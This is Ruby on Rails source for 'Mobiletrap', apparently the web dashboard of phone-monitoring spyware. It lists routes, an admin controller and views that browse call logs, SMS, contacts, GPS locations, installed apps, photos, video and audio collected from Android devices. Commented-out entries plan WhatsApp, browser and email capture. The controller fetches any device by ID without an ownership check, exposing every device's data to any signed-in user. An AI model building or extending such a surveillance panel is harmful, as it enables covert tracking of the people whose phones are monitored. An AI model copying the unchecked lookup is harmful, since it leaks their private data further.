config/routes.rb
Mobiletrap::Application.routes.draw do
  mount Bootsy::Engine => '/bootsy', as: 'bootsy'
  get 'signup',     to: 'users#new',        as: :signup
  get 'signin',     to: 'sessions#new',     as: :signin
  get 'demo',       to: 'sessions#demo',    as: :demo
  get 'signout',    to: 'sessions#destroy', as: :signout
  delete 'signout', to: 'sessions#destroy', as: :signout_delete
  get 'home',       to: 'sessions#index',   as: :dashboard
  get 'reset',      to: 'sessions#reset',   as: :reset
  get '/contactus',:to => 'admin/forms#new', :as => 'contactus'
    

  namespace :admin do
    resources :users
    resources :pages
    resources :forms, only: [:create, :new, :index, :show]
    resources :devices
    resources :messages
    resources :logs
    resources :apps
    resources :contacts
    resources :locations
    resources :images do
      get 'display/:version', :action => 'display', :as => 'display'
    end
    resources :audios do
      get 'display'
    end
    resources :videos do
      get 'display'
    end
  end
  resources :users, only: [:new, :create]
  resources :sessions, only: [:index, :new, :create]
  resources :pages, only: [:show]

  root :to => "pages#show", :id => 'home'

end

app/controllers/admin/base_controller.rb
module Admin
  class BaseController < ApplicationController
    layout "subscriber"
    before_action :authorize
    
    def all_device
      if current_user.admin
        @all_device ||= Device.all
      else
        @all_device ||= current_user.devices
      end
    end
    helper_method :all_device
    
    def selected_device
      if params[:device_id] && params[:device_id] != ""
        @selected_device ||= Device.find(params[:device_id])
      end
      @selected_device ||= all_device
    end
    helper_method :selected_device
  end
end

app/views/admin/base/_searchbar.html.erb
<%= form_tag('', {method: :get, class: 'form-inline', role: 'form'}) do %>
  <div class="row">
    <div class="col-lg-3">
      <div class="input-group">
        <span class="input-group-addon devise-select-label"><i class="fa fa-android"></i></span>
        <%= select_tag :device_id, options_for_select(all_device.collect{ |u| [u.name, u.id] }, params[:device_id]), prompt: "Pick a Device", class: "form-control input-device" %>
      </div>
    </div><!-- /.col-lg-6 -->
    <div class="col-lg-8 input-daterange">
      <div class="row">
        <div class="col-lg-6">
          <div class="input-group">
            <span class="input-group-addon">From</span>
            <%= text_field_tag :start_time, params[:start_time], placeholder: 'Start Time', class: 'form-control input-small' %>
          </div>
        </div>
        <div class="col-lg-6">
          <div class="input-group">
            <span class="input-group-addon">To</span>
            <%= text_field_tag :end_time, params[:end_time], placeholder: 'End Time', class: 'form-control input-small' %>
          </div>
        </div>
      </div>
    </div><!-- /.col-lg-6 -->
    <div class="col-lg-1">
      <div class="input-group">
        <%= submit_tag(:search, class: 'btn btn-default') %>
      </div>
    </div>
  </div><!-- /.row -->
<% end %>

app/views/admin/base/_sidebar.html.erb
<ul class="nav">
  <li>
  <%= link_to(admin_devices_path(), class: "active") do %>
    <%= content_tag(:i, "", class: "fa fa-mobile fa-mobilex") %> Device Info <%= content_tag(:span, all_device.size, class: "field-count btn btn-xs btn-black") %>
  <% end %>
  </li>
  <li>
  <%= link_to(admin_logs_path(device_id: params[:device_id], start_time: params[:start_time], end_time: params[:end_time])) do %>
    <%= content_tag(:i, "", class: "fa fa-phone") %> Call History <%= content_tag(:span, Log.where(device_id: selected_device).count, class: "field-count btn btn-xs btn-black") %>
  <% end %>
  </li>
  <li>
  <%= link_to(admin_contacts_path(device_id: params[:device_id], start_time: params[:start_time], end_time: params[:end_time])) do %>
    <%= content_tag(:i, "", class: "fa fa-book") %> Address Book <%= content_tag(:span, Contact.where(device_id: selected_device).count, class: "field-count btn btn-xs btn-black") %>
  <% end %>
  </li>
  <li>
  <%= link_to(admin_messages_path(device_id: params[:device_id], start_time: params[:start_time], end_time: params[:end_time])) do %>
    <%= content_tag(:i, "", class: "fa fa-comment") %> SMS History <%= content_tag(:span, Message.where(device_id: selected_device).count, class: "field-count btn btn-xs btn-black") %>
  <% end %>
  </li>
  <li>
  <%= link_to(admin_locations_path(device_id: params[:device_id], start_time: params[:start_time], end_time: params[:end_time])) do %>
    <%= content_tag(:i, "", class: "fa fa-map-marker") %> GPS Location <%= content_tag(:span, Location.where(device_id: selected_device).count, class: "field-count btn btn-xs btn-black") %>
  <% end %>
  </li>
  <li>
  <%= link_to(admin_apps_path(device_id: params[:device_id], start_time: params[:start_time], end_time: params[:end_time])) do %>
    <%= content_tag(:i, "", class: "fa fa-briefcase") %> Installed App <%= content_tag(:span, App.where(device_id: selected_device).count, class: "field-count btn btn-xs btn-black") %>
  <% end %>
  </li>
  <!--li>
  <%= link_to("#") do %>
    <%= content_tag(:i, "", class: "fa fa-globe") %> GPS Notification <%= content_tag(:span, "#", class: "field-count btn btn-xs btn-black") %>
  <% end %>
  </li-->
  <li>
  <%= link_to(admin_images_path(device_id: params[:device_id], start_time: params[:start_time], end_time: params[:end_time])) do %>
    <%= content_tag(:i, "", class: "fa fa-camera") %> Images <%= content_tag(:span, Image.where(device_id: selected_device).count, class: "field-count btn btn-xs btn-black") %>
  <% end %>
  </li>
  <li>
  <%= link_to(admin_videos_path(device_id: params[:device_id], start_time: params[:start_time], end_time: params[:end_time])) do %>
    <%= content_tag(:i, "", class: "fa fa-film") %> Video File <%= content_tag(:span, Video.where(device_id: selected_device).count, class: "field-count btn btn-xs btn-black") %>
  <% end %>
  </li>
  <li>
  <%= link_to(admin_audios_path(device_id: params[:device_id], start_time: params[:start_time], end_time: params[:end_time])) do %>
    <%= content_tag(:i, "", class: "fa fa-music") %> Audio File <%= content_tag(:span, Audio.where(device_id: selected_device).count, class: "field-count btn btn-xs btn-black") %>
  <% end %>
  </li>
  <!--li>
  <%= link_to("#") do %>
    <%= content_tag(:i, "", class: "fa fa-comments") %> WhatsApp <%= content_tag(:span, "#", class: "field-count btn btn-xs btn-black") %>
  <% end %>
  </li-->
  <!--li>
  <%= link_to("#") do %>
    <%= content_tag(:i, "", class: "fa fa-globe") %> Browser History <%= content_tag(:span, "#", class: "field-count btn btn-xs btn-black") %>
  <% end %>
  </li>
  <li>
  <%= link_to("#") do %>
    <%= content_tag(:i, "", class: "fa fa-envelope") %> Email History <%= content_tag(:span, "#", class: "field-count btn btn-xs btn-black") %>
  <% end %>
  </li>
  <li>
  <%= link_to("#") do %>
    <%= content_tag(:i, "", class: "fa fa-bookmark") %> Bookmarks <%= content_tag(:span, "#", class: "field-count btn btn-xs btn-black") %>
  <% end %>
  </li>
  <li>
  <%= link_to("#") do %>
    <%= content_tag(:i, "", class: "fa fa-tasks") %> Events <%= content_tag(:span, "#", class: "field-count btn btn-xs btn-black") %>
  <% end %>
  </li-->
  <% if current_user.admin? %>
    <li>
    <%= link_to(admin_users_path) do %>
      <%= content_tag(:i, "", class: "fa fa-briefcase") %> Users <%= content_tag(:span, User.count, class: "field-count btn btn-xs btn-black") %>
    <% end %>
    </li>
    <li>
    <%= link_to(admin_pages_path) do %>
      <%= content_tag(:i, "", class: "fa fa-book") %> Pages <%= content_tag(:span, Page.count, class: "field-count btn btn-xs btn-black") %>
    <% end %>
    </li>
    
    <li>
    <%= link_to(admin_forms_path) do %>
      <%= content_tag(:i, "", class: "fa fa-comment") %> Forms <%= content_tag(:span, Form.count, class: "field-count btn btn-xs btn-black") %>
    <% end %>
    </li>

    <li>
    <%= link_to(reset_path) do %>
      <%= content_tag(:i, "", class: "fa fa-thumbs-o-down
") %> Reset
    <% end %>
    </li>
  <% end %>
</ul>